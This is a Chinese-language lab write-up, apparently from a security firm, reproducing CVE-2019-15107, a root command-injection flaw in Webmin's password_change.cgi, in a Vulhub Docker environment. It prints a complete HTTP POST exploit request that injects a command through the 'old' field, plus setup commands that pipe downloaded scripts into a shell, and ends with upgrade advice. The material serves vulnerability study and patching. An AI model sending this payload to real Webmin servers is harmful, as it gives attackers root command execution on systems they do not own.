CVE-2019-15107 Webmin 远程命令执行漏洞
Webmin 中的password_change.cgi可在外部输入数据构造特殊代码,任何被授权使用Package Updates模块的用户都可以使用根权限通过包含的向量执行任意命令。
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。
漏洞的评定结果如下:
评定方式 等级
威胁等级 严重
影响面 广泛
Webmin <= 1.920
所需系统环境及配置信息
靶机
操作系统:CentOS 7
IP:192.168.246.133
攻击机
操作系统:Wimdows 10
IP:192.168.246.1
所需工具
Docker Vulhub
安装步骤
1、安装Vulhub
`yum -y install python3 git && curl -s https://get.docker.com/ | sh && curl -s https://bootstrap.pypa.io/get-pip.py | python3 && pip install docker-compose && git clone https://github.com/vulhub/vulhub.git && curl -sSL https://get.daocloud.io/daotools/set_mirror.sh | sh -s http://f1361db2.m.daocloud.io && systemctl start docker`
2、启动环境
cd vulhub/webmin/CVE-2019-15107/ && docker-compose up -d
3、docker ps -a查看当前启动的容器ID,
docker exec -it 0f474318311e /bin/bash
通过ID进入容器修改ROOT账户密码
4、返回网页使用ROOT账户密码登录Webmin,登录后根据下图指示,启用设置修改密码功能
1、访问:
`https://<your-ip>/password_change.cgi `
并用burp抓取数据包。
2、将内容改为如下payload,执行的命令为 id。
POST /password_change.cgi HTTP/1.1
Host: 192.168.246.133:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.246.133:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2
3、发送payload,发现命令执行成功。
目前Webmin官方已发布最新版本Webmin 1.940 修复了该漏洞,请受影响的用户尽快升级至最新版本,下载链接:
http://webmin.com/download.html
海狼科技官方微博:
如果您遇到网络安全问题
欢迎致电:0991-8156363
或发送至:sudo@xjsec.cn
新疆海狼科技,您身边的网络安全助理
更多资讯请扫描底部二维码